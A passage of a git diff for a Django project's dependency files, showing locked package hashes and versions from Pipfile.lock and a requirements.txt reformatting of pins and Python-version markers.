"sha256:6df99c3578dc4eb33f3eb26bc28277ab40a720b71649d940bff9c1f704377772", + "sha256:6ef7430e45c5fa0bb6c361cada4a08ed9c184b5ed086815a85c3bc8c5054566b", + "sha256:73b2db09fe15b6e444c0bd566a125a385ca6493456224ce8b367d734f079f576", + "sha256:73d4ec2997716af3c8f28f7e3d3a565d273a598982d2fe95639e07ce4db5da45", + "sha256:73e3e2fd9da009d558050697cc22ad689f89a14a2ef2e67304628a913e59c947", + "sha256:890f577aec554f142e01daf890221d10e4f93a9b1107998d631d3f075b55e8f8", + "sha256:8a34a2a8b220247658f7ced871197c390b3a6371d796a5869ab1c62abe0be527", + "sha256:8bc23e9ddcb523c3ffb4d712aa0bd5bc67b34ff4e2b23fb557012171bdb4013a", + "sha256:945297fc344fef4d540135180ce7babeb2291d124698cc6282f3eac624aa5e82", + "sha256:aaa869d9199d7d4c70a57678aff21654cc179c0c32bcfde87f1d65d0ff47e520", + "sha256:bc33fc20ddfd89b86b7710142963490d8c4ee8307ed6cc5e189a58fa72390eb9", + "sha256:cfe6d8b293d123255fd3b475b5f4e851eb5cbaee2064c8933aa27344381744ae", + "sha256:d16ac5ab3d9db78fed40c884d67079524e4cf8276639211ad9e6fa73e727727e" + ], + "index": "pypi", + "version": "==0.19.1" + }, + "python-crontab": { + "hashes": [ + "sha256:6d5ba3c190ec76e4d252989a1644fcb233dbf53fbc8fceeb9febe1657b9fb1d4", + "sha256:79fb7465039ddfd4fb93d072d6ee0d45c1ac8bf1597f0686ea14fd4361dba379" + ], + "version": "==3.0.0" + }, + "python-dateutil": { + "hashes": [ + "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86", + "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.8.2" + }, + "python-docx": { + "hashes": [ + "sha256:1105d233a0956dd8dd1e710d20b159e2d72ac3c301041b95f4d4ceb3e0ebebc4" + ], + "index": "pypi", + "version": "==0.8.11" + }, + "python-json-logger": { + "hashes": [ + "sha256:23e7ec02d34237c5aa1e29a070193a4ea87583bb4e7f8fd06d3de8264c4b2e1c", + "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd" + ], + "index": "pypi", + "version": "==2.0.7" + }, + "pytz": { + "hashes": [ + "sha256:222439474e9c98fced559f1709d89e6c9cbf8d79c794ff3eb9f8800064291427", + "sha256:e89512406b793ca39f5971bc999cc538ce125c0e51c27941bef4568b460095e2" + ], + "index": "pypi", + "version": "==2022.6" + }, + "pyyaml": { + "hashes": [ + "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc", + "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741", + "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206", + "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27", + "sha256:1d4c7e777c441b20e32f52bd377e0c409713e8bb1386e1099c2415f26e479595", + "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62", + "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98", + "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696", + "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d", + "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867", + "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47", + "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486", + "sha256:5773183b6446b2c99bb77e77595dd486303b4faab2b086e7b17bc6bef28865f6", + "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3", + "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007", + "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938", + "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c", + "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735", + "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d", + "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba", + "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8", + "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5", + "sha256:afd7e57eddb1a54f0f1a974bc4391af8bcce0b444685d936840f125cf046d5bd", + "sha256:b1275ad35a5d18c62a7220633c913e1b42d44b46ee12554e5fd39c70a243d6a3", + "sha256:b786eecbdf8499b9ca1d697215862083bd6d2a99965554781d0d8d1ad31e13a0", + "sha256:ba336e390cd8e4d1739f42dfe9bb83a3cc2e80f567d8805e11b46f4a943f5515", + "sha256:baa90d3f661d43131ca170712d903e6295d1f7a0f595074f151c0aed377c9b9c", + "sha256:bc1bf2925a1ecd43da378f4db9e4f799775d6367bdb94671027b73b393a7c42c", + "sha256:bd4af7373a854424dabd882decdc5579653d7868b8fb26dc7d0e99f823aa5924", + "sha256:bf07ee2fef7014951eeb99f56f39c9bb4af143d8aa3c21b1677805985307da34", + "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43", + "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859", + "sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673", + "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a", + "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab", + "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa", + "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c", + "sha256:fca0e3a251908a499833aa292323f32437106001d436eca0e6e7833256674585", + "sha256:fd1592b3fdf65fff2ad0004b5e363300ef59ced41c2e6b3a99d4089fa8c5435d", + "sha256:fd66fc5d0da6d9815ba2cebeb4205f95818ff4b79c3ebe268e75d961704af52f" + ], + "markers": "python_version >= '3.6'", + "version": "==6.0.1" + }, + "redis": { + "hashes": [ + "sha256:68226f7ede928db8302f29ab088a157f41061fa946b7ae865452b6d7838bbffb", + "sha256:da92a39fec86438d3f1e2a1db33c312985806954fe860120b582a8430e231d8f" + ], + "index": "pypi", + "version": "==4.4.4" + }, + "requests": { + "hashes": [ + "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f", + "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1" + ], + "index": "pypi", + "version": "==2.31.0" + }, + "result": { + "hashes": [ + "sha256:c48c909e92181a075ba358228a3fe161e26d205dad416ad81f27f23515a5626d", + "sha256:d6a6258f32c057a4e0478999c6ce43dcadaf8ea435f58ac601ae2768f93ef243" + ], + "index": "pypi", + "version": "==0.8.0" + }, + "s3transfer": { + "hashes": [ + "sha256:b014be3a8a2aab98cfe1abc7229cc5a9a0cf05eb9c1f2b86b230fd8df3f78084", + "sha256:cab66d3380cca3e70939ef2255d01cd8aece6a4907a9528740f668c4b0611861" + ], + "markers": "python_version >= '3.7'", + "version": "==0.6.2" + }, + "scipy": { + "hashes": [ + "sha256:0f3261f14b767b316d7137c66cc4f33a80ea05841b9c87ad83a726205b901423", + "sha256:10eb6af2f751aa3424762948e5352f707b0dece77288206f227864ddf675aca0", + "sha256:1342ca385c673208f32472830c10110a9dcd053cf0c4b7d4cd7026d0335a6c1d", + "sha256:214cdf04bbae7a54784f8431f976704ed607c4bc69ba0d5d5d6a9df84374df76", + "sha256:2b997a5369e2d30c97995dcb29d638701f8000d04df01b8e947f206e5d0ac788", + "sha256:2c91cf049ffb5575917f2a01da1da082fd24ed48120d08a6e7297dfcac771dcd", + "sha256:3aeb87661de987f8ec56fa6950863994cd427209158255a389fc5aea51fa7055", + "sha256:4447ad057d7597476f9862ecbd9285bbf13ba9d73ce25acfa4e4b11c6801b4c9", + "sha256:542a757e2a6ec409e71df3d8fd20127afbbacb1c07990cb23c5870c13953d899", + "sha256:8d9886f44ef8c9e776cb7527fb01455bf4f4a46c455c4682edc2c2cc8cd78562", + "sha256:90d3b1364e751d8214e325c371f0ee0dd38419268bf4888b2ae1040a6b266b2a", + "sha256:95763fbda1206bec41157582bea482f50eb3702c85fffcf6d24394b071c0e87a", + "sha256:ac74b1512d38718fb6a491c439aa7b3605b96b1ed3be6599c17d49d6c60fca18", + "sha256:afdb0d983f6135d50770dd979df50bf1c7f58b5b33e0eb8cf5c73c70600eae1d", + "sha256:b0620240ef445b5ddde52460e6bc3483b7c9c750275369379e5f609a1050911c", + "sha256:b133f237bd8ba73bad51bc12eb4f2d84cbec999753bf25ba58235e9fc2096d80", + "sha256:b29318a5e39bd200ca4381d80b065cdf3076c7d7281c5e36569e99273867f61d", + "sha256:b8425fa963a32936c9773ee3ce44a765d8ff67eed5f4ac81dc1e4a819a238ee9", + "sha256:d2b813bfbe8dec6a75164523de650bad41f4405d35b0fa24c2c28ae07fcefb20", + "sha256:d690e1ca993c8f7ede6d22e5637541217fc6a4d3f78b3672a6fe454dbb7eb9a7", + "sha256:e367904a0fec76433bf3fbf3e85bf60dae8e9e585ffd21898ab1085a29a04d16", + "sha256:ea932570b1c2a30edafca922345854ff2cd20d43cd9123b6dacfdecebfc1a80b", + "sha256:f28f1f6cfeb48339c192efc6275749b2a25a7e49c4d8369a28b6591da02fbc9a", + "sha256:f73102f769ee06041a3aa26b5841359b1a93cc364ce45609657751795e8f4a4a", + "sha256:fa4909c6c20c3d91480533cddbc0e7c6d849e7d9ded692918c76ce5964997898" + ], + "markers": "python_version < '3.13' and python_version >= '3.9'", + "version": "==1.11.2" + }, + "setuptools": { + "hashes": [ + "sha256:d0b9a8433464d5800cbe05094acf5c6d52a91bfac9b52bcfc4d41382be5d5d31", + "sha256:e197a19aa8ec9722928f2206f8de752def0e4c9fc6953527360d1c36d94ddb2f" + ], + "index": "pypi", + "version": "==65.5.1" + }, + "shortuuid": { + "hashes": [ + "sha256:27ea8f28b1bd0bf8f15057a3ece57275d2059d2b0bb02854f02189962c13b6aa", + "sha256:fc75f2615914815a8e4cb1501b3a513745cb66ef0fd5fc6fb9f8c3fa3481f789" + ], + "index": "pypi", + "version": "==1.0.11" + }, + "simhash": { + "hashes": [ + "sha256:49c5d81f31254f7e3f71dc2f5a245625c3d6143584478fdf4ffd2e63e4929366", + "sha256:533bc8cf41e4e6dd83f0b1847363516bf3323e0fa92e63d9e6df4e281e882e1b", + "sha256:634f41eb63d1c2dd1719459a859a985b2e0f2457670c9739c4d831a218409e8c", + "sha256:968de16c82c227a631aa00e57ab58f9e4ee9e47e8408486199a9eb59c1d6979b", + "sha256:a1dd9c4e2688fac260b5a810434326395bd23a566f5a8d5b9eac1336cc746d7f" + ], + "index": "pypi", + "version": "==2.1.2" + }, + "six": { + "hashes": [ + "sha256:30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259", + "sha256:8b74bedcbbbaca38ff6d7491d76f2b06b3592611af620f8426e82dddb04a5ced" + ], + "index": "pypi", + "version": "==1.15.0" + }, + "sqlparse": { + "hashes": [ + "sha256:5430a4fe2ac7d0f93e66f1efc6e1338a41884b7ddf2a350cedd20ccc4d9d28f3", + "sha256:d446183e84b8349fa3061f0fe7f06ca94ba65b426946ffebe6e3e8295332420c" + ], + "markers": "python_version >= '3.5'", + "version": "==0.4.4" + }, + "tablib": { + "extras": [ + "html", + "ods", + "xls", + "xlsx", + "yaml" + ], + "hashes": [ + "sha256:9821caa9eca6062ff7299fa645e737aecff982e6b2b42046928a6413c8dabfd9", + "sha256:f6661dfc45e1d4f51fa8a6239f9c8349380859a5bfaa73280645f046d6c96e33" + ], + "markers": "python_version >= '3.8'", + "version": "==3.5.0" + }, + "tomli": { + "hashes": [ + "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc", + "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f" + ], + "markers": "python_version < '3.11'", + "version": "==2.0.1" + }, + "tornado": { + "hashes": [ + "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f", + "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5", + "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d", + "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3", + "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2", + "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a", + "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16", + "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a", + "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17", + "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0", + "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe" + ], + "markers": "python_version >= '3.8'", + "version": "==6.3.3" + }, + "types-awscrt": { + "hashes": [ + "sha256:0e31d7ba44e1898af37d224b94d28ffaef19baf89bb18ea2599de9ac0910a07f", + "sha256:eaef60422cf716b4ae216f164b74d679c82b0d9c53db380a37deb29ae5579b1b" + ], + "markers": "python_version >= '3.7' and python_version < '4.0'", + "version": "==0.19.0" + }, + "types-pymysql": { + "hashes": [ + "sha256:72bdaecb88de4a30bc3e1842e1d4522ceb3c4b2e883a6a2a7a7162775dd27b93", + "sha256:9aec9ee0453314d477ef26e5832b4a992bc4cc3557358d62b0fe4af760a7728f" + ], + "index": "pypi", + "version": "==1.1.0.1" + }, + "types-pyopenssl": { + "hashes": [ + "sha256:19536aa3debfbe25a918cf0d898e9f5fbbe6f3594a429da7914bf331deb1b342", + "sha256:6a010dac9ecd42b582d7dd2cc3e9e40486b79b3b64bb2fffba1474ff96af906d" + ], + "version": "==23.2.0.2" + }, + "types-python-dateutil": { + "hashes": [ + "sha256:1f4f10ac98bb8b16ade9dbee3518d9ace017821d94b057a425b069f834737f4b", + "sha256:f977b8de27787639986b4e28963263fd0e5158942b3ecef91b9335c130cb1ce9" + ], + "index": "pypi", + "version": "==2.8.19.14" + }, + "types-pytz": { + "hashes": [ + "sha256:1a7b8d4aac70981cfa24478a41eadfcd96a087c986d6f150d77e3ceb3c2bdfab", + "sha256:65152e872137926bb67a8fe6cc9cfd794365df86650c5d5fdc7b167b0f38892e" + ], + "version": "==2023.3.0.1" + }, + "types-pyyaml": { + "hashes": [ + "sha256:7d340b19ca28cddfdba438ee638cd4084bde213e501a3978738543e27094775b", + "sha256:a461508f3096d1d5810ec5ab95d7eeecb651f3a15b71959999988942063bf01d" + ], + "index": "pypi", + "version": "==6.0.12.11" + }, + "types-redis": { + "hashes": [ + "sha256:4f662060247a2363c7a8f0b7e52915d68960870ff16a749a891eabcf87ed0be4", + "sha256:5f179d10bd3ca995a8134aafcddfc3e12d52b208437c4529ef27e68acb301f38" + ], + "index": "pypi", + "version": "==4.6.0.5" + }, + "types-requests": { + "hashes": [ + "sha256:56d181c85b5925cbc59f4489a57e72a8b2166f18273fd8ba7b6fe0c0b986f12a", + "sha256:6aa3f7faf0ea52d728bb18c0a0d1522d9bfd8c72d26ff6f61bfc3d06a411cf40" + ], + "index": "pypi", + "version": "==2.31.0.2" + }, + "types-s3transfer": { + "hashes": [ + "sha256:1068877b6e59be5226fa3006ae64371ac9d5bc590dfdbd9c66fd0a075d3254ac", + "sha256:4ba9b483796fdcd026aa162ee03bdcedd2bf7d08e9387c820dcdd158b0102057" + ], + "markers": "python_version >= '3.7' and python_version < '4.0'", + "version": "==0.6.2" + }, + "types-urllib3": { + "hashes": [ + "sha256:229b7f577c951b8c1b92c1bc2b2fdb0b49847bd2af6d1cc2a2e3dd340f3bda8f", + "sha256:9683bbb7fb72e32bfe9d2be6e04875fbe1b3eeec3cbb4ea231435aa7fd6b4f0e" + ], + "index": "pypi", + "version": "==1.26.25.14" + }, + "typing-extensions": { + "hashes": [ + "sha256:440d5dd3af93b060174bf433bccd69b0babc3b15b1a8dca43789fd7f61514b36", + "sha256:b75ddc264f0ba5615db7ba217daeb99701ad295353c45f9e95963337ceeeffb2" + ], + "index": "pypi", + "version": "==4.7.1" + }, + "typing-inspect": { + "hashes": [ + "sha256:9ee6fc59062311ef8547596ab6b955e1b8aa46242d854bfc78f4f6b0eff35f9f", + "sha256:b23fc42ff6f6ef6954e4852c1fb512cdd18dbea03134f91f856a95ccc9461f78" + ], + "version": "==0.9.0" + }, + "tzdata": { + "hashes": [ + "sha256:11ef1e08e54acb0d4f95bdb1be05da659673de4acbd21bf9c69e94cc5e907a3a", + "sha256:7e65763eef3120314099b6939b5546db7adce1e7d6f2e179e3df563c70511eda" + ], + "markers": "python_version >= '2'", + "version": "==2023.3" + }, + "uritemplate": { + "hashes": [ + "sha256:4346edfc5c3b79f694bccd6d6099a322bbeb628dbf2cd86eea55a456ce5124f0", + "sha256:830c08b8d99bdd312ea4ead05994a38e8936266f84b9a7878232db50b044e02e" + ], + "markers": "python_version >= '3.6'", + "version": "==4.1.1" + }, + "urllib3": { + "hashes": [ + "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", + "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" + ], + "index": "pypi", + "version": "==1.26.5" + }, + "uwsgi": { + "hashes": [ + "sha256:4cc4727258671ac5fa17ab422155e9aaef8a2008ebb86e4404b66deaae965db2" + ], + "index": "pypi", + "version": "==2.0.22" + }, + "uwsgitop": { + "hashes": [ + "sha256:99ca245119e4a0600840a62b7b4e020c9870fe90952b24eecfff0c9090c75d14" + ], + "index": "pypi", + "version": "==0.11" + }, + "vine": { + "hashes": [ + "sha256:4c9dceab6f76ed92105027c49c823800dd33cacce13bdedc5b914e3514b7fb30", + "sha256:7d3b1624a953da82ef63462013bbd271d3eb75751489f9807598e8f340bd637e" + ], + "markers": "python_version >= '3.6'", + "version": "==5.0.0" + }, + "wcwidth": { + "hashes": [ + "sha256:795b138f6875577cd91bba52baf9e445cd5118fd32723b460e30a0af30ea230e", + "sha256:a5220780a404dbe3353789870978e472cfe477761f06ee55077256e509b156d0" + ], + "version": "==0.2.6" + }, + "xlrd": { + "hashes": [ + "sha256:6a33ee89877bd9abc1158129f6e94be74e2679636b8a205b43b85206c3f0bbdd", + "sha256:f72f148f54442c6b056bf931dbc34f986fd0c3b0b6b5a58d013c9aef274d0c88" + ], + "version": "==2.0.1" + }, + "xlwt": { + "hashes": [ + "sha256:a082260524678ba48a297d922cc385f58278b8aa68741596a87de01a9c628b2e", + "sha256:c59912717a9b28f1a3c2a98fd60741014b06b043936dcecbc113eaaada156c88" + ], + "index": "pypi", + "version": "==1.3.0" + }, + "zope.event": { + "hashes": [ + "sha256:2832e95014f4db26c47a13fdaef84cef2f4df37e66b59d8f1f4a8f319a632c26", + "sha256:bac440d8d9891b4068e2b5a2c5e2c9765a9df762944bda6955f96bb9b91e67cd" + ], + "markers": "python_version >= '3.7'", + "version": "==5.0" + }, + "zope.interface": { + "hashes": [ + "sha256:042f2381118b093714081fd82c98e3b189b68db38ee7d35b63c327c470ef8373", + "sha256:0ec9653825f837fbddc4e4b603d90269b501486c11800d7c761eee7ce46d1bbb", + "sha256:12175ca6b4db7621aedd7c30aa7cfa0a2d65ea3a0105393e05482d7a2d367446", + "sha256:1592f68ae11e557b9ff2bc96ac8fc30b187e77c45a3c9cd876e3368c53dc5ba8", + "sha256:23ac41d52fd15dd8be77e3257bc51bbb82469cf7f5e9a30b75e903e21439d16c", + "sha256:424d23b97fa1542d7be882eae0c0fc3d6827784105264a8169a26ce16db260d8", + "sha256:4407b1435572e3e1610797c9203ad2753666c62883b921318c5403fb7139dec2", + "sha256:48f4d38cf4b462e75fac78b6f11ad47b06b1c568eb59896db5b6ec1094eb467f", + "sha256:4c3d7dfd897a588ec27e391edbe3dd320a03684457470415870254e714126b1f", + "sha256:5171eb073474a5038321409a630904fd61f12dd1856dd7e9d19cd6fe092cbbc5", + "sha256:5a158846d0fca0a908c1afb281ddba88744d403f2550dc34405c3691769cdd85", + "sha256:6ee934f023f875ec2cfd2b05a937bd817efcc6c4c3f55c5778cbf78e58362ddc", + "sha256:790c1d9d8f9c92819c31ea660cd43c3d5451df1df61e2e814a6f99cebb292788", + "sha256:809fe3bf1a91393abc7e92d607976bbb8586512913a79f2bf7d7ec15bd8ea518", + "sha256:87b690bbee9876163210fd3f500ee59f5803e4a6607d1b1238833b8885ebd410", + "sha256:89086c9d3490a0f265a3c4b794037a84541ff5ffa28bb9c24cc9f66566968464", + "sha256:99856d6c98a326abbcc2363827e16bd6044f70f2ef42f453c0bd5440c4ce24e5", + "sha256:aab584725afd10c710b8f1e6e208dbee2d0ad009f57d674cb9d1b3964037275d", + "sha256:af169ba897692e9cd984a81cb0f02e46dacdc07d6cf9fd5c91e81f8efaf93d52", + "sha256:b39b8711578dcfd45fc0140993403b8a81e879ec25d53189f3faa1f006087dca", + "sha256:b3f543ae9d3408549a9900720f18c0194ac0fe810cecda2a584fd4dca2eb3bb8", + "sha256:d0583b75f2e70ec93f100931660328965bb9ff65ae54695fb3fa0a1255daa6f2", + "sha256:dfbbbf0809a3606046a41f8561c3eada9db811be94138f42d9135a5c47e75f6f", + "sha256:e538f2d4a6ffb6edfb303ce70ae7e88629ac6e5581870e66c306d9ad7b564a58", + "sha256:eba51599370c87088d8882ab74f637de0c4f04a6d08a312dce49368ba9ed5c2a", + "sha256:ee4b43f35f5dc15e1fec55ccb53c130adb1d11e8ad8263d68b1284b66a04190d", + "sha256:f2363e5fd81afb650085c6686f2ee3706975c54f331b426800b53531191fdf28", + "sha256:f299c020c6679cb389814a3b81200fe55d428012c5e76da7e722491f5d205990", + "sha256:f72f23bab1848edb7472309e9898603141644faec9fd57a823ea6b4d1c4c8995", + "sha256:fa90bac61c9dc3e1a563e5babb3fd2c0c1c80567e815442ddbe561eadc803b30" + ], + "markers": "python_version >= '3.7'", + "version": "==6.0" + } + }, + "develop": {} } diff --git a/requirements.txt b/requirements.txt index 9496a22dd..6a543121d 100644 --- a/requirements.txt +++ b/requirements.txt @@ -2,129 +2,130 @@ aliyun-python-sdk-core==2.13.36 aliyun-python-sdk-core-v3==2.13.33 aliyun-python-sdk-kms==2.16.1 -amqp==5.1.1; python_version >= '3.6' -asgiref==3.7.2; python_version >= '3.7' -async-timeout==4.0.3; python_version >= '3.7' -attrs==23.1.0; python_version >= '3.7' -autopep8==2.0.4; python_version >= '3.6' -billiard==4.1.0; python_version >= '3.7' -boto3==1.24.59; python_version >= '3.7' -boto3-stubs==1.28.35; python_version >= '3.7' -botocore==1.27.91; python_version >= '3.7' -botocore-stubs==1.31.35; python_version >= '3.7' and python_version < '4.0' -celery==5.3.0rc1; python_version >= '3.7' -celery-singleton==0.3.1; python_version >= '3.6' and python_version < '4.0' -certifi==2023.7.22; python_version >= '3.6' +amqp==5.1.1 ; python_version >= '3.6' +asgiref==3.7.2 +async-timeout==4.0.3 ; python_version >= '3.7' +attrs==23.1.0 ; python_version >= '3.7' +autopep8==2.0.4 ; python_version >= '3.6' +billiard==4.1.0 ; python_version >= '3.7' +boto3==1.24.59 +boto3-stubs==1.28.35 +botocore==1.27.91 +botocore-stubs==1.31.35 +celery==5.3.0rc1 +celery-singleton==0.3.1 +certifi==2023.7.22 cffi==1.15.1 -chardet==5.2.0; python_version >= '3.7' -charset-normalizer==3.2.0; python_full_version >= '3.7.0' -click==8.1.7; python_version >= '3.7' -click-didyoumean==0.3.0; python_full_version >= '3.6.2' and python_full_version < '4.0.0' +chardet==5.2.0 +charset-normalizer==3.2.0 ; python_full_version >= '3.7.0' +click==8.1.7 ; python_version >= '3.7' +click-didyoumean==0.3.0 ; python_full_version >= '3.6.2' and python_full_version < '4.0.0' click-plugins==1.1.1 -click-repl==0.3.0; python_version >= '3.6' +click-repl==0.3.0 ; python_version >= '3.6' crcmod==1.7 -cryptography==41.0.3; python_version >= '3.7' -dataclasses-json==0.5.14; python_version < '3.13' and python_version >= '3.7' +cryptography==41.0.3 +dataclasses-json==0.5.14 ddt==1.6.0 -defusedxml==0.7.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -diff-match-patch==20230430; python_version >= '3.7' -django==3.2.20; python_version >= '3.6' +defusedxml==0.7.1 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' +diff-match-patch==20230430 ; python_version >= '3.7' +django==3.2.20 django-add-default-value==0.10.0 django-celery-beat==2.2.0 -django-cors-headers==4.2.0; python_version >= '3.8' +django-cors-headers==4.2.0 django-cprofile-middleware==1.0.5 django-elasticsearch-dsl==7.2.2 -django-filter==23.2; python_version >= '3.7' -django-health-check==3.17.0; python_version >= '3.8' -django-import-export==2.5.0; python_version >= '3.5' -django-mock-queries==2.1.7 +django-filter==23.2 +django-health-check==3.17.0 +django-import-export==2.5.0 +django-mock-queries==v2.1.7 django-modeltranslation==0.17.7 django-prometheus==2.3.1 django-ranged-response==0.2.0 -django-redis==5.2.0; python_version >= '3.6' +django-redis==5.2.0 django-rest-framework-proxy==1.6.0 -django-seriously==0.4.3; python_version >= '3.6' -django-silk==5.0.3; python_version >= '3.7' +django-seriously==0.4.3 +django-silk==5.0.3 django-simple-captcha==0.5.18 -django-stubs[compatible-mypy]==1.15.0; python_version >= '3.7' -django-stubs-ext==4.2.2; python_version >= '3.8' -django-timezone-field==4.2.3; python_version >= '3.5' +django-stubs[compatible-mypy]==1.15.0 +django-stubs-ext==4.2.2 ; python_version >= '3.8' +django-timezone-field==4.2.3 ; python_version >= '3.5' django-utils==0.0.2 -django-utils-six==2.0; python_version >= '3.6' and python_version < '4.0' +django-utils-six==2.0 django-xff==1.4.0 -djangorestframework==3.12.4; python_version >= '3.5' -djangorestframework-dataclasses==1.3.0; python_version >= '3.7' -djangorestframework-stubs[compatible-mypy]==1.9.1; python_version >= '3.7' +djangorestframework==3.12.4 +djangorestframework-dataclasses==1.3.0 +djangorestframework-stubs[compatible-mypy]==1.9.1 docxcompose==1.3.4 docxtpl==0.16.0 -drf-spectacular==0.22.1; python_version >= '3.6' -elasticsearch==7.17.7; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4' -elasticsearch-dsl==7.4.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' -et-xmlfile==1.1.0; python_version >= '3.6' -flower==2.0.1; python_version >= '3.7' -gevent==22.10.2; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5' -gprof2dot==2022.7.29; python_version >= '2.7' -greenlet==2.0.2; platform_python_implementation == 'CPython' -gunicorn==20.1.0; python_version >= '3.5' -humanize==4.8.0; python_version >= '3.8' -id-validator==1.0.20; python_version >= '3' -idna==2.10; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' -inflection==0.5.1; python_version >= '3.5' -jinja2==3.1.2; python_version >= '3.7' -jmespath==0.10.0; python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3' -jq==1.3.0; python_version >= '3.5' -jsonlog==4.0.0; python_version >= '3.6' and python_version < '4.0' -jsonschema==4.17.0; python_version >= '3.7' -kombu==5.3.1; python_version >= '3.8' -lxml==4.9.1; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4' -marisa-trie==0.8.0; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +drf-spectacular==0.22.1 +elasticsearch==7.17.7 +elasticsearch-dsl==7.4.1 ; python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' +et-xmlfile==1.1.0 ; python_version >= '3.6' +flower==2.0.1 +gevent==22.10.2 +gprof2dot==2022.7.29 ; python_version >= '2.7' +greenlet==2.0.2 ; platform_python_implementation == 'CPython' +gunicorn==20.1.0 +humanize==4.8.0 ; python_version >= '3.8' +id-validator==1.0.20 +idna==2.10 +inflection==0.5.1 ; python_version >= '3.5' +jinja2==3.1.2 ; python_version >= '3.7' +jmespath==0.10.0 ; python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3' +jq==1.3.0 +jsonlog==4.0.0 +jsonschema==4.17.0 +kombu==5.3.1 ; python_version >= '3.8' +lxml==4.9.1 +marisa-trie==0.8.0 markuppy==1.14 -markupsafe==2.1.3; python_version >= '3.7' -marshmallow==3.20.1; python_version >= '3.8' -mock==5.1.0; python_version >= '3.6' -model-bakery==1.15.0; python_version >= '3' -mypy==1.0.1; python_version >= '3.7' -mypy-extensions==1.0.0; python_version >= '3.5' -mysqlclient==2.2.0; python_version >= '3.8' +markupsafe==2.1.3 ; python_version >= '3.7' +marshmallow==3.20.1 ; python_version >= '3.8' +mock==5.1.0 ; python_version >= '3.6' +model-bakery==1.15.0 ; 